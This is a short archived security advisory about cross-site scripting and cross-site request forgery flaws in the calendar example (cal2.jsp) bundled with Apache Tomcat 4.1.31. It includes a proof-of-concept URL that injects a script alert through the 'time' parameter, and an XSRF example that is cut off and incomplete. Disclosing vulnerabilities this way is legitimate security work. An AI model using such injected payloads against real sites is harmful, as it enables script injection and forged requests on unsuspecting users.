AOH :: TB12401.HTM
Apache tomcat calendar example cross site scripting and cross site request forgery vulnerability
|
Apache tomcat calendar example cross site scripting and cross site request forgery vulnerability
Apache tomcat calendar example cross site scripting and cross site request forgery vulnerability
Apache Tomcat/4.1.31 ships with built in examples. One of the example calendar.jsp suffers from input validation error and could be exploited for cross site scriptingand cross site request forgery.
XSS
http://myserver:myport/examples/jsp/cal/cal2.jsp?time=8am%3cscript%3ealert("XSS!")%3c%2fscript%3e
XSRF
http://myserver:myport/examples/jsp/cal/cal2.jsp?time=>
-
Tushar Vartak
The entire AOH site is optimized to look best in Firefox® 2.0 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.